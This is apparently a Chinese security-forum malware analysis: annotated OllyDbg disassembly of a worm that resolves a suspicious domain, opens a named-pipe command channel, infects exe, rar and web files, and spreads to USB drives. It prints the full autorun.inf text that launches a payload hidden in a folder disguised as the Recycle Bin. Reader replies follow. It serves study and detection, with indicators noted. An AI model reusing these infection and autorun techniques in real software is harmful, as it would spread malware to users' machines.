00872D4C|.A3 50DC8700 mov dword ptr , eax ; -> 0087DC50
00872D51|.68 B0958700 push 008795B0 ; /ProcNameOrOrdinal = "HttpQueryInfoA"
00872D56|.FF75 F4 push dword ptr ; |hModule
00872D59|.FF15 F4908700 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D5F|.A3 54DC8700 mov dword ptr , eax ; -> 0087DC54
00872D64|.68 C0958700 push 008795C0 ; /ProcNameOrOrdinal = "InternetReadFileExA"
00872D69|.FF75 F4 push dword ptr ; |hModule
00872D6C|.FF15 F4908700 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D72|.A3 58DC8700 mov dword ptr , eax ; -> 0087DC58
00872D77|.68 D4958700 push 008795D4 ; /ProcNameOrOrdinal = "InternetCloseHandle"
00872D7C|.FF75 F4 push dword ptr ; |hModule
00872D7F|.FF15 F4908700 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D85|.A3 5CDC8700 mov dword ptr , eax ; -> 0087DC5C
00872D8A|.68 E8958700 push 008795E8 ; /ProcNameOrOrdinal = "InternetSetStatusCallback"
00872D8F|.FF75 F4 push dword ptr ; |hModule
00872D92|.FF15 F4908700 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D98|.A3 60DC8700 mov dword ptr , eax ; -> 0087DC60; the whole Wininet API set is now resolved
; ---------------------------------------------------------------------------
; Thread A2, step 3: DNS probing and server address resolution.
;   WSAStartup(2.2); getaddrinfo("www.xunlei.com") -> [ebp-1A4] as a second
;   reachability check (analyst: "testing network?"); freeaddrinfo.
;   getaddrinfo("www.3-0B6F-415d-B5C7-832F0.com") -> [ebp-1A4]; then
;   WSAAddressToStringA(res->ai_addr [+0x18], res->ai_addrlen [+0x10], NULL,
;                       buf at [ebp-1E8], &len) converts the resolved address
;   to text; freeaddrinfo.
; Defender note: the DNS query for www.3-0B6F-415d-B5C7-832F0.com is the
; network indicator of this stage; the resolved address string is presumably
; used for the Wininet download resolved just before (not shown).
; ---------------------------------------------------------------------------
008727D9 > \8D85 70FEFFFF lea eax, dword ptr ; &WSADATA at [ebp-190]
008727DF .50 push eax ; /pWSAData
008727E0 .68 02020000 push 202 ; |RequestedVersion = 202 (2.2.)
008727E5 .FF15 44928700 call dword ptr [<&WS2_32.#115>] ; \WSAStartup
008727EB >8D85 5CFEFFFF lea eax, dword ptr ; &result (addrinfo**) at [ebp-1A4]
008727F1 .50 push eax ; ppResult
008727F2 .6A 00 push 0 ; pHints = NULL
008727F4 .6A 00 push 0 ; pServiceName = NULL
008727F6 .68 44958700 push 00879544 ;ASCII "www.xunlei.com"
008727FB .FF15 48928700 call dword ptr [<&WS2_32.getaddrinfo>>;ws2_32.getaddrinfo
00872801 .85C0 test eax, eax ; 0 = resolved; analyst: another network reachability test
00872812 > \FFB5 5CFEFFFF push dword ptr ; addrinfo* from the probe
00872818 .FF15 50928700 call dword ptr [<&WS2_32.freeaddrinfo>;ws2_32.freeaddrinfo
0087281E .6A 40 push 40 ; /probe result freed; 0x40 is an argument of the next (unshown) call
0087283C .68 54958700 push 00879554 ;ASCII "www.3-0B6F-415d-B5C7-832F0.com"
00872841 .FF15 48928700 call dword ptr [<&WS2_32.getaddrinfo>>;ws2_32.getaddrinfo
00872847 .85C0 test eax, eax ; resolve www.3-0B6F-415d-B5C7-832F0.com (analyst: "opens" it; only DNS resolution is visible here)
0087285B .50 push eax ; lpdwAddressStringLength
0087285C .8D85 18FEFFFF lea eax, dword ptr ; output buffer at [ebp-1E8]
00872862 .50 push eax ; lpszAddressString
00872863 .6A 00 push 0 ; lpProtocolInfo = NULL
00872865 .8B85 5CFEFFFF mov eax, dword ptr ; eax = addrinfo*
0087286B .FF70 10 push dword ptr ; dwAddressLength = ai_addrlen ([eax+0x10])
0087286E .8B85 5CFEFFFF mov eax, dword ptr ; eax = addrinfo*
00872874 .FF70 18 push dword ptr ; lpsaAddress = ai_addr ([eax+0x18])
00872877 .FF95 60FEFFFF call dword ptr ;ws2_32.WSAAddressToStringA via pointer in [ebp-1A0]
0087287D .FFB5 5CFEFFFF push dword ptr ; resolved address converted to a string; free the addrinfo
00872883 .FF15 50928700 call dword ptr [<&WS2_32.freeaddrinfo>;ws2_32.freeaddrinfo
; ---------------------------------------------------------------------------
; Thread A2, step 4: spawn a worker (entry 00873588), keep its handle in
; [ebp-8] and in global 0087DC68, then WaitForSingleObject on it with the
; timeout held in global 0087B5E4 (900000 ms = 15 min per Olly).
; Olly displayed hObject as NULL at capture time; the lines between 00873824
; and 00873841 are not shown, so whether the wait really targets the thread
; handle cannot be confirmed from this excerpt.
; ---------------------------------------------------------------------------
0087380C|> \6A 00 push 0 ; /pThreadId = NULL
0087380E|.6A 00 push 0 ; |CreationFlags = 0
00873810|.6A 00 push 0 ; |pThreadParm = NULL
00873812|.68 88358700 push 00873588 ; |ThreadFunction = appmgmts.00873588
00873817|.6A 00 push 0 ; |StackSize = 0
00873819|.6A 00 push 0 ; |pSecurity = NULL
0087381B|.FF15 80918700 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00873821|.8945 F8 mov dword ptr , eax ; worker thread handle -> [ebp-8]
00873841|.A3 68DC8700 mov dword ptr , eax ; also published in global 0087DC68
00873846|>FF35 E4B58700 push dword ptr ; /Timeout = 900000. ms
0087384C|.FF35 68DC8700 push dword ptr ; |hObject = NULL
00873852|.FF15 50918700 call dword ptr [<&KERNEL32.WaitForSin>; \WaitForSingleObject
00873858|.85C0 test eax, eax ; WAIT_OBJECT_0 (0) = worker finished (analyst: "wait for the thread to end")
线程A3:
创建命名管道 \\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A ,等待并接收命令。
; ---------------------------------------------------------------------------
; Thread A3: local command channel over a named pipe.
;   1. CreateFileA(pipe name at [ebp-C], GENERIC_READ|GENERIC_WRITE,
;      OPEN_EXISTING) -> [ebp-10]. Opening the pipe as a client first looks
;      like a "is another instance already serving it?" check -- TODO confirm
;      from the branch that follows (not shown).
;   2. CreateNamedPipeA(name, PIPE_ACCESS_DUPLEX (3),
;      PIPE_TYPE_MESSAGE|PIPE_READMODE_MESSAGE (6), nMaxInstances = 1,
;      out/in buffers 0x100, default timeout, no SD) -> [ebp-8].
;   3. ConnectNamedPipe(hPipe, NULL) -- blocks until a client connects.
; Pipe name per analyst: \\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A.
; Defender note: the pipe name is a stable host-based indicator; the handler
; that reads commands from it is outside this excerpt.
; ---------------------------------------------------------------------------
00878CCC .6A 00 push 0 ; /hTemplateFile = NULL
00878CCE .6A 00 push 0 ; |Attributes = 0
00878CD0 .6A 03 push 3 ; |Mode = OPEN_EXISTING
00878CD2 .6A 00 push 0 ; |pSecurity = NULL
00878CD4 .6A 00 push 0 ; |ShareMode = 0
00878CD6 .68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00878CDB .FF75 F4 push dword ptr ; |FileName = pipe path in [ebp-C]
00878CDE .FF15 C4908700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00878CE4 .8945 F0 mov dword ptr , eax ; client-side open of \\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A -> [ebp-10]
00878D1C > \6A 00 push 0 ; lpSecurityAttributes = NULL
00878D1E .6A 00 push 0 ; nDefaultTimeOut = 0
00878D20 .68 00010000 push 100 ; nInBufferSize = 0x100
00878D25 .68 00010000 push 100 ; nOutBufferSize = 0x100
00878D2A .6A 01 push 1 ; nMaxInstances = 1
00878D2C .6A 06 push 6 ; dwPipeMode = PIPE_TYPE_MESSAGE|PIPE_READMODE_MESSAGE
00878D2E .6A 03 push 3 ; dwOpenMode = PIPE_ACCESS_DUPLEX
00878D30 .FF75 F4 push dword ptr ;appmgmts.00879AC0 = lpName (the pipe path)
00878D33 .FF15 68908700 call dword ptr [<&KERNEL32.CreateName>;kernel32.CreateNamedPipeA
00878D39 .8945 F8 mov dword ptr , eax ; server end of \\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A -> [ebp-8]
00878D41 .6A 00 push 0 ; lpOverlapped = NULL (synchronous)
00878D43 .FF75 F8 push dword ptr ; hNamedPipe
00878D46 .FF15 78908700 call dword ptr [<&KERNEL32.ConnectNam>;kernel32.ConnectNamedPipe
00878D4C .6A 00 push 0 ; /blocks here waiting for a client connection (analyst)
线程A4:
感染exe,rar,htm,html,asp,aspx文件
; ---------------------------------------------------------------------------
; Thread A4: rewrite a target file in place (analyst: infects exe, rar, htm,
; html, asp, aspx files). Target path = [ebp+8].
;   CreateFileA(path, GENERIC_READ|GENERIC_WRITE, no sharing, OPEN_EXISTING)
;       -> [ebp-68]
;   SetFilePointer(h, 0, NULL, FILE_END) -> [ebp-24]  (= current file size)
;   CreateFileMappingA(h, NULL, PAGE_READWRITE, 0, 0, NULL) -> [ebp-30]
;   MapViewOfFile(hMap, FILE_MAP_ALL_ACCESS (0F001F), 0, 0, 0x400) -> [ebp-28]
;       ... the first 0x400 bytes are modified here (not shown) ...
;   FlushViewOfFile(view, 0x400); UnmapViewOfFile; CloseHandle(hMap);
;   SetFilePointer(h, [ebp-E8] + [ebp-54], NULL, FILE_END); SetEndOfFile.
; The final two calls move the end of file by [ebp-E8]+[ebp-54] bytes
; relative to the current end, i.e. the file grows (or shrinks, if the sum
; is negative -- cannot tell from here); what fills the new tail is outside
; this excerpt. Defender note: exclusive open + header rewrite + size change
; on many user files is the file-system behaviour to alert on.
; ---------------------------------------------------------------------------
0876E17 > \6A 00 push 0 ; /hTemplateFile = NULL
00876E19 .68 80000000 push 80 ; |Attributes = NORMAL
00876E1E .6A 03 push 3 ; |Mode = OPEN_EXISTING
00876E20 .6A 00 push 0 ; |pSecurity = NULL
00876E22 .6A 00 push 0 ; |ShareMode = 0
00876E24 .68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00876E29 .FF75 08 push dword ptr ; |FileName = target path ([ebp+8])
00876E2C .FF15 C4908700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00876E32 .8945 98 mov dword ptr , eax ; target hFile -> [ebp-68] (exclusive access: ShareMode = 0)
00876E51 .6A 02 push 2 ; /Origin = FILE_END
00876E53 .6A 00 push 0 ; |pOffsetHi = NULL
00876E55 .6A 00 push 0 ; |OffsetLo = 0
00876E57 .FF75 98 push dword ptr ; |hFile
00876E5A .FF15 28918700 call dword ptr [<&KERNEL32.SetFilePoi>; \SetFilePointer
00876E60 .8945 DC mov dword ptr , eax ; seek to end; returned position = file size -> [ebp-24]
00876E63 .6A 00 push 0 ; /MapName = NULL
00876E65 .6A 00 push 0 ; |MaximumSizeLow = 0
00876E67 .6A 00 push 0 ; |MaximumSizeHigh = 0
00876E69 .6A 04 push 4 ; |Protection = PAGE_READWRITE
00876E6B .6A 00 push 0 ; |pSecurity = NULL
00876E6D .FF75 98 push dword ptr ; |hFile
00876E70 .FF15 74918700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileMappingA
00876E84 > \68 00040000 push 400 ; /MapSize = 400 (1024.)
00876E89 .6A 00 push 0 ; |OffsetLow = 0
00876E8B .6A 00 push 0 ; |OffsetHigh = 0
00876E8D .68 1F000F00 push 0F001F ; |AccessMode = F001F (FILE_MAP_ALL_ACCESS)
00876E92 .FF75 D0 push dword ptr ; |hMapObject ([ebp-30])
00876E95 .FF15 60918700 call dword ptr [<&KERNEL32.MapViewOfF>; \MapViewOfFile
00876FB0 .68 00040000 push 400 ; /FlushSize = 400
00876FB5 .FF75 D8 push dword ptr ; |FlushBase = view ([ebp-28]); the header edits between 00876E9B and 00876FB0 are not shown
00876FB8 .FF15 94908700 call dword ptr [<&KERNEL32.FlushViewO>; \FlushViewOfFile
00877304 .FF75 D8 push dword ptr ; /BaseAddress
00877307 .FF15 64918700 call dword ptr [<&KERNEL32.UnmapViewO>; \UnmapViewOfFile
0087730D .FF75 D0 push dword ptr ; /hObject = mapping handle
00877310 .FF15 10918700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00877316 .8365 D8 00 and dword ptr , 0 ; view pointer cleared
0087731A .8365 D0 00 and dword ptr , 0 ; mapping handle cleared
0087731E .6A 02 push 2 ; /Origin = FILE_END
00877320 .6A 00 push 0 ; |pOffsetHi = NULL
00877322 .8B85 18FFFFFF mov eax, dword ptr ; | eax = [ebp-E8]
00877328 .0345 AC add eax, dword ptr ; | eax += [ebp-54]  (new length delta relative to current end)
0087732B .50 push eax ; |OffsetLo
0087732C .FF75 98 push dword ptr ; |hFile
0087732F .FF15 28918700 call dword ptr [<&KERNEL32.SetFilePoi>; \SetFilePointer
00877335 .FF75 98 push dword ptr ; /hFile
00877338 .FF15 30918700 call dword ptr [<&KERNEL32.SetEndOfFi>; \SetEndOfFile
线程A5:
感染可移动磁盘
; ---------------------------------------------------------------------------
; Thread A5, part 1: seed a removable drive with an autorun.inf.
;   SetFileAttributesA(path at [ebp-218], NORMAL) -- analyst: the folder
;       recycle.{645FF040-5081-101B-9F08-00AA002F954E}. That GUID is the
;       shell's Recycle Bin CLSID, so Explorer renders the folder as a
;       Recycle Bin and hides its real contents -- a common autorun-worm
;       disguise.
;   PathFileExistsA(<drive>\autorun.inf) -> cmp eax, 1
;   CreateFileA(path at [ebp-B28], GENERIC_READ|GENERIC_WRITE, CREATE_ALWAYS)
;       -> [ebp-21C]  (autorun.inf, overwriting any existing one)
;   WriteFile(h, text at [ebp-A20], lstrlenA(text), &[ebp-10C], NULL)
; The written text (hex dump that follows) is an [autorun] section whose
; OPEN=, shell\open\Command= and shell\explore\Command= entries all run
; recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe. Defender note:
; an autorun.inf pointing into a recycle.{CLSID} folder is a solid
; removable-media indicator.
; ---------------------------------------------------------------------------
008787A4 .68 80000000 push 80 ; /FileAttributes = NORMAL
008787A9 .8D85 E8FDFFFF lea eax, dword ptr ; |
008787AF .50 push eax ; |FileName
008787B0 .FF15 80908700 call dword ptr [<&KERNEL32.SetFileAtt>; \SetFileAttributesA
008787B6 .68 80000000 push 80 ; /attributes of recycle.{645FF040-5081-101B-9F08-00AA002F954E} set to NORMAL (analyst); 0x80 is the next call's argument
008787E0 .50 push eax ; /Path = "MZ",90,"autorun.inf"
008787E1 .FF15 F0918700 call dword ptr [<&SHLWAPI.PathFileExi>; \PathFileExistsA
008787E7 .83F8 01 cmp eax, 1 ; does autorun.inf already exist on the drive? (BOOL tested as == 1)
00878955 > \6A 00 push 0 ; /hTemplateFile = NULL
00878957 .68 80000000 push 80 ; |Attributes = NORMAL
0087895C .6A 02 push 2 ; |Mode = CREATE_ALWAYS
0087895E .6A 00 push 0 ; |pSecurity = NULL
00878960 .6A 00 push 0 ; |ShareMode = 0
00878962 .68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00878967 .8D85 D8F4FFFF lea eax, dword ptr ; |
0087896D .50 push eax ; |FileName
0087896E .FF15 C4908700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00878974 .8985 E4FDFFFF mov dword ptr , eax ; hFile for the new autorun.inf -> [ebp-21C]
00878988 > \6A 00 push 0 ; /pOverlapped = NULL
0087898A .8D85 F4FEFFFF lea eax, dword ptr ; |
00878990 .50 push eax ; |pBytesWritten
00878991 .8D85 E0F5FFFF lea eax, dword ptr ; |
00878997 .50 push eax ; |/String
00878998 .FF15 D0908700 call dword ptr [<&KERNEL32.lstrlenA>] ; |\lstrlenA
0087899E .50 push eax ; |nBytesToWrite = strlen(text)
0087899F .8D85 E0F5FFFF lea eax, dword ptr ; |
008789A5 .50 push eax ; |Buffer = 0006EC78
008789A6 .FFB5 E4FDFFFF push dword ptr ; |hFile
008789AC .FF15 E0908700 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile
008789B2 .FFB5 E4FDFFFF push dword ptr ; /writes the autorun.inf content shown in the dump below; hFile pushed for CloseHandle
0006EC785B 61 75 74 6F 72 75 6E 5D 0D 0A 4F 50 45 4E 3D..OPEN=
0006EC8872 65 63 79 63 6C 65 2E 7B 36 34 35 46 46 30 34recycle.{645FF04
0006EC9830 2D 35 30 38 31 2D 31 30 31 42 2D 39 46 30 380-5081-101B-9F08
0006ECA82D 30 30 41 41 30 30 32 46 39 35 34 45 7D 5C 53-00AA002F954E}\S
0006ECB865 74 75 70 2E 65 78 65 0D 0A 73 68 65 6C 6C 5Cetup.exe..shell\
0006ECC86F 70 65 6E 3D B4 F2 BF AA 28 26 4F 29 0D 0A 73open=打开(&O)..s
0006ECD868 65 6C 6C 5C 6F 70 65 6E 5C 43 6F 6D 6D 61 6Ehell\open\Comman
0006ECE864 3D 72 65 63 79 63 6C 65 2E 7B 36 34 35 46 46d=recycle.{645FF
0006ECF830 34 30 2D 35 30 38 31 2D 31 30 31 42 2D 39 46040-5081-101B-9F
0006ED0830 38 2D 30 30 41 41 30 30 32 46 39 35 34 45 7D08-00AA002F954E}
0006ED185C 53 65 74 75 70 2E 65 78 65 20 53 68 6F 77 0D\Setup.exe Show.
0006ED280A 73 68 65 6C 6C 5C 6F 70 65 6E 5C 44 65 66 61.shell\open\Defa
0006ED3875 6C 74 3D 31 2F 2F 0D 0A 73 68 65 6C 6C 5C 65ult=1//..shell\e
0006ED4878 70 6C 6F 72 65 3D D7 CA D4 B4 B9 DC C0 ED C6xplore=资源管理
0006ED58F7 28 26 58 29 0D 0A 73 68 65 6C 6C 5C 65 78 70?&X)..shell\exp
0006ED686C 6F 72 65 5C 43 6F 6D 6D 61 6E 64 3D 72 65 63lore\Command=rec
0006ED7879 63 6C 65 2E 7B 36 34 35 46 46 30 34 30 2D 35ycle.{645FF040-5
0006ED8830 38 31 2D 31 30 31 42 2D 39 46 30 38 2D 30 30081-101B-9F08-00
0006ED9841 41 30 30 32 46 39 35 34 45 7D 5C 53 65 74 75AA002F954E}\Setu
0006EDA870 2E 65 78 65 20 53 68 6F 77 p.exe Show
; ---------------------------------------------------------------------------
; Thread A5, part 2: create the disguised folder and the payload it points to.
;   CreateDirectoryA(path at [ebp-108], NULL)
;       -- analyst: recycle.{645FF040-5081-101B-9F08-00AA002F954E}
;   CreateFileA(path at [ebp-218], GENERIC_READ|GENERIC_WRITE, CREATE_ALWAYS)
;       -> [ebp-21C]  -- analyst: ...\Setup.exe inside that folder
; The bytes written into Setup.exe are outside this excerpt.
; ---------------------------------------------------------------------------
008789BE .6A 00 push 0 ; /pSecurity = NULL
008789C0 .8D85 F8FEFFFF lea eax, dword ptr ; |
008789C6 .50 push eax ; |Path
008789C7 .FF15 84908700 call dword ptr [<&KERNEL32.CreateDire>; \CreateDirectoryA
008789CD .8D85 F8FEFFFF lea eax, dword ptr ; folder recycle.{645FF040-5081-101B-9F08-00AA002F954E} created (analyst); eax = its path again
008789F0 > \6A 00 push 0 ; /hTemplateFile = NULL
008789F2 .68 80000000 push 80 ; |Attributes = NORMAL
008789F7 .6A 02 push 2 ; |Mode = CREATE_ALWAYS
008789F9 .6A 00 push 0 ; |pSecurity = NULL
008789FB .6A 00 push 0 ; |ShareMode = 0
008789FD .68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00878A02 .8D85 E8FDFFFF lea eax, dword ptr ; |
00878A08 .50 push eax ; |FileName
00878A09 .FF15 C4908700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00878A0F .8985 E4FDFFFF mov dword ptr , eax ; hFile for recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe -> [ebp-21C]
线程A6(无限循环):
; ---------------------------------------------------------------------------
; Thread A6 (analyst: infinite loop): raw ICMP socket bound to the local host.
;   gethostname(buf at [ebp-1D8], 0x40); gethostbyname(buf)
;   socket(AF_INET, SOCK_RAW, IPPROTO_ICMP) -> [ebp-4]
;   bind(s, addr->ai_addr [+0x18], addr->ai_addrlen [+0x10]) -> cmp eax, -1
;   WSARecvFrom(s, &WSABUF at [ebp-14], 1, &received [ebp-C], &flags [ebp-8],
;               pFrom, pFromSize, pOverlapped, NULL) -> [ebp-4]
;   sendto(s, data at [ebp-408], len [ebp-10648], 0,
;          to->ai_addr [+0x18], to->ai_addrlen [+0x10]) -> cmp eax, -1
; The fields at +0x10/+0x18 match the addrinfo layout used elsewhere in this
; sample (ai_addrlen / ai_addr); the struct base ([ebp-105C0], [ebp-40C])
; is set outside this excerpt. What the ICMP payload carries is not shown.
; Defender note: opening SOCK_RAW/IPPROTO_ICMP requires administrative
; rights on Windows; a user-mode process sending and receiving raw ICMP in
; a loop is unusual and can be alerted on at the host and network level.
; ---------------------------------------------------------------------------
0878043 .6A 40 push 40 ; /BufSize = 40 (64.)
00878045 .8D85 28FEFFFF lea eax, dword ptr ; |
0087804B .50 push eax ; |Buffer
0087804C .FF15 74928700 call dword ptr [<&WS2_32.#57>] ; \gethostname
00878052 .8D85 28FEFFFF lea eax, dword ptr ; local host name obtained; resolve it to an address
00878058 .50 push eax ; /Name
00878059 .FF15 2C928700 call dword ptr [<&WS2_32.#52>] ; \gethostbyname
00877ABF > \6A 01 push 1 ; /Protocol = IPPROTO_ICMP
00877AC1 .6A 03 push 3 ; |Type = SOCK_RAW
00877AC3 .6A 02 push 2 ; |Family = AF_INET
00877AC5 .FF15 34928700 call dword ptr [<&WS2_32.#23>] ; \socket
00877ACB .8945 FC mov dword ptr , eax ; raw ICMP socket -> [ebp-4]
00877B04 .FF70 10 push dword ptr ; /AddrLen = [eax+0x10] (ai_addrlen-style field)
00877B07 .8B85 40FAFEFF mov eax, dword ptr ; | eax = address struct pointer from [ebp-105C0]
00877B0D .FF70 18 push dword ptr ; |pSockAddr = [eax+0x18] (ai_addr-style field)
00877B10 .FF75 FC push dword ptr ; |Socket
00877B13 .FF15 60928700 call dword ptr [<&WS2_32.#2>] ; \bind
00877B19 .83F8 FF cmp eax, -1 ; bind to the local address; SOCKET_ERROR check
00877974|.6A 00 push 0 ; /Callback = NULL
00877976|.FF75 1C push dword ptr ; |pOverlapped ([ebp+1C])
00877979|.FF75 18 push dword ptr ; |pFromSize ([ebp+18])
0087797C|.FF75 14 push dword ptr ; |pFrom ([ebp+14])
0087797F|.8D45 F8 lea eax, dword ptr ; |
00877982|.50 push eax ; |pFlags (&[ebp-8])
00877983|.8D45 F4 lea eax, dword ptr ; |
00877986|.50 push eax ; |pReceivedCount (&[ebp-C])
00877987|.6A 01 push 1 ; |nBuffers = 1
00877989|.8D45 EC lea eax, dword ptr ; |
0087798C|.50 push eax ; |pBuffers (WSABUF at [ebp-14])
0087798D|.FF75 08 push dword ptr ; |Socket ([ebp+8])
00877990|.FF15 6C928700 call dword ptr [<&WS2_32.WSARecvFrom>>; \WSARecvFrom
00877996|.8945 FC mov dword ptr , eax ; receive raw ICMP; result -> [ebp-4]
00877C1C .FF70 10 push dword ptr ; /ToLength = [eax+0x10]
00877C1F .8B85 F4FBFFFF mov eax, dword ptr ; | eax = destination address struct pointer from [ebp-40C]
00877C25 .FF70 18 push dword ptr ; |pTo = [eax+0x18]
00877C28 .6A 00 push 0 ; |Flags = 0
00877C2A .FFB5 B8F9FEFF push dword ptr ; |DataSize ([ebp-10648])
00877C30 .8D85 F8FBFFFF lea eax, dword ptr ; |
00877C36 .50 push eax ; |Data = 0005EA74 (buffer at [ebp-408])
00877C37 .FF75 FC push dword ptr ; |Socket
00877C3A .FF15 64928700 call dword ptr [<&WS2_32.#20>] ; \sendto
00877C40 .83F8 FF cmp eax, -1 ; send raw ICMP; SOCKET_ERROR check (analyst: "sending...")
大概的都分析了,驱动应该是杀进程的。
加精,感谢分享。
做得很好,学习了。
很好。。为学习提供了方便,,,这才叫共享。。。
我加Hmily 说个话他都没时间理我..
你用什么方法. :)
eee建议再分析一下感染文件
学习了,谢谢楼主分享这么好的东西
你们是怎样分析的 工具能分享下嘛 我好想 试试
学习分析病毒软件 太深奥。囧